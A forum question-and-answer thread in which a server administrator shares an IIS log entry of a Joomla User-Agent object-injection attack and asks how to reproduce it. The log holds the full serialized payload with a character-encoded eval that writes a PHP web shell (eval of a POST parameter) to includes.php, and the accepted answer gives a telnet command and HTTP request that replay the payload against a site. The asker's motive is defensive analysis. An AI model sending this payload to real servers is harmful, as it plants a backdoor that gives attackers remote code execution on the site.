Try to Test Hack Attempt with Telnet

Question

My server recently was attacked by hackers trying to run code on a web site, and I would like to test what they there trying to do. I'm not sure how to build the telnet command to do this.

2016-06-09 17:02:11 192.168.1.1 GET / - 80 - 176.31.245.146 }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:870:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(116).chr(111).chr(109).chr(93).chr(41).chr(63).chr(62).chr(32).chr(60).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;} - 200 0 0 2609

date: 2016-06-09
time: 17:02:11
s-ip: 192.168.1.1.
cs-method: GET
cs-uri-stem: /
cs-uri-query: -
s-port: 80
cs-username: -
cs-ip: 176.31.245.146
cs(User-Agent): }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:870:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(116).chr(111).chr(109).chr(93).chr(41).chr(63).chr(62).chr(32).chr(60).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
cs(Referer): -
sc-status: 200
sc-substatus: 0
sc-win32-status: 0 
time-taken: 2609

The eval code decodes to this:

<?php fputs(fopen($_SERVER['DOCUMENT_ROOT'] . '/includes.php', 'w'), '<?php eval($_POST[tom])?> <pppppppp>');

How do I make a telnet command using this information?

Thanks.

The code is copied from an IIS log file. – UltraJ Jun 14 '16 at 00:34 — UltraJ, Jun 14 '16 at 00:34

score 1 · Accepted Answer · edited May 23 '17 at 11:33

telnet yoursite.com 80

GET / HTTP/1.0
Host: yoursite.com
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:870:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(116).chr(111).chr(109).chr(93).chr(41).chr(63).chr(62).chr(32).chr(60).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(112).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

Terminated with 2 CR/LFs.

See: https://stackoverflow.com/questions/15772355/how-to-send-an-http-request-using-telnet

I was interested in how a User-Agent string could be used in an exploit, and found this, which you might be interested in reading: https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/.

Try to Test Hack Attempt with Telnet

1 Answers1